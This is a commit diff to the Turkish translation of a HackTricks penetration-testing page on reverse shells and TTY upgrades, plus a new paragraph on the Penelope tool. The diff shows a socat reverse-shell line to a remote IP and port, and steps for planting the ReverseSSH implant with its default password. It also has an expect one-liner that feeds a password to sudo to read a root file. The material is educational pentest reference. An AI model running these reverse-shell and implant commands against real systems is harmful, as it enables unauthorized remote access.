Translated ['generic-methodologies-and-resources/reverse-shells/full-tty

This commit is contained in:
Translator 2024-09-25 15:11:20 +00:00
parent 550b45aa98
commit b8488fc8dc

View file

@ -17,7 +17,7 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
## Full TTY
`SHELL` değişkeninde ayarladığınız shell'in **mutlaka** _**/etc/shells**_ içinde **listelenmiş olması gerektiğini** unutmayın veya `SHELL değişkeni için değer /etc/shells dosyasında bulunamadı. Bu olay rapor edildi` mesajını alırsınız. Ayrıca, sonraki kod parçalarının yalnızca bash'te çalıştığını unutmayın. Eğer zsh'deyseniz, shell'i elde etmeden önce `bash` komutunu çalıştırarak bash'e geçin.
`SHELL` değişkeninde ayarladığınız shell'in **mutlaka** _**/etc/shells**_ içinde **listelenmiş olması gerektiğini** unutmayın veya `SHELL değişkeni için değer /etc/shells dosyasında bulunamadı. Bu olay rapor edilmiştir.` Ayrıca, sonraki kod parçalarının yalnızca bash'te çalıştığını unutmayın. Eğer zsh'de iseniz, shell'i elde etmeden önce `bash` komutunu çalıştırarak bash'e geçin.
#### Python
@ -67,7 +67,7 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
## ReverseSSH
**Etkileşimli shell erişimi**, **dosya transferleri** ve **port yönlendirmesi** için uygun bir yol, statik bağlantılı ssh sunucusu [ReverseSSH](https://github.com/Fahrj/reverse-ssh)'yi hedefe bırakmaktır.
**Etkileşimli shell erişimi**, **dosya transferleri** ve **port yönlendirmesi** için uygun bir yol, statik bağlantılı ssh sunucusu [ReverseSSH](https://github.com/Fahrj/reverse-ssh) 'yi hedefe bırakmaktır.
Aşağıda `x86` için upx sıkıştırılmış ikili dosyalarla bir örnek bulunmaktadır. Diğer ikili dosyalar için [sürümler sayfasını](https://github.com/Fahrj/reverse-ssh/releases/latest/) kontrol edin.
@ -104,7 +104,7 @@ reverse-ssh.exe -p 4444 kali@10.0.0.2
```
{% endcode %}
* Eğer ReverseSSH port yönlendirme isteği başarılı olduysa, `reverse-ssh(.exe)`'yi çalıştıran kullanıcının bağlamında varsayılan şifre `letmeinbrudipls` ile giriş yapabilmelisiniz:
* Eğer ReverseSSH port yönlendirme isteği başarılı olduysa, artık `reverse-ssh(.exe)`'yi çalıştıran kullanıcının bağlamında varsayılan şifre `letmeinbrudipls` ile giriş yapabilmelisiniz:
```bash
# Interactive shell access
ssh -p 8888 127.0.0.1
@ -112,9 +112,15 @@ ssh -p 8888 127.0.0.1
# Bidirectional file transfer
sftp -P 8888 127.0.0.1
```
## Penelope
Penelope (https://github.com/brightio/penelope) otomatik olarak Linux ters kabuklarını TTY'ye yükseltir, terminal boyutunu yönetir, her şeyi kaydeder ve daha fazlasını yapar. Ayrıca Windows kabukları için readline desteği sağlar.
![penelope](https://github.com/user-attachments/assets/27ab4b3a-780c-4c07-a855-fd80a194c01e)
## No TTY
Eğer bir sebepten dolayı tam bir TTY elde edemiyorsanız, **yine de kullanıcı girişi bekleyen programlarla etkileşimde bulunabilirsiniz**. Aşağıdaki örnekte, şifre `sudo`'ya bir dosyayı okumak için iletiliyor:
Eğer bir sebepten dolayı tam bir TTY elde edemiyorsanız, **hala kullanıcı girişi bekleyen programlarla etkileşimde bulunabilirsiniz**. Aşağıdaki örnekte, bir dosyayı okumak için şifre `sudo`'ya iletilir:
```bash
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
```
@ -127,7 +133,7 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
</details>